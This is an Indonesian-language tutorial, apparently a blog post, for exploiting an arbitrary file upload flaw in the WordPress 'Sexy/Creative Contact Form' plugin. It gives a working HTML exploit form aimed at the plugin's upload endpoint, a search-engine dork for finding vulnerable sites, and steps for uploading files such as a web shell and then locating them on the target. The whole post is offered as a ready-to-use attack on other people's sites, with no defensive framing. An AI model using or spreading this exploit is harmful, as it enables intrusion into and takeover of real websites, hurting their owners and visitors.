Tutorial Creative Contact Form - Arbitrary File Upload
Langsung saja
Bahan-bahan
1. xampp ( download )
2. php Exploiter
<form method="POST" action="
http://target/wp-content/plugins/sexy-contact-form/includes/fileupload/index.php"
enctype="multipart/form-data">
<input type="file" name="files[]" /><button>Upload</button>
</form>
Ganti http://target dengan targetmu nanti taruh di xampp>htdocs>exploit.php
Save dengan format .php , tipe all file
3. Dork : inurl:"wp-content/plugins/sexy-contact-form"
Dork bisa di kembangin lagi sendiri.
Langkah-langkah.
-aktifin xampp nya
-Dorking, masukan target mu di exploit tadi
- lalu buka di browsermu http://localhost/exploitmu.php
-uploud terserah anda, entah shell,txt,gambar,php atau html
-jika sukses lihat hasil uploadmu disini
http://TARGET/wp-content/plugins/sexy-contact-form/includes/fileupload/files/FILENAME.extensi
wasalam
0 Komentar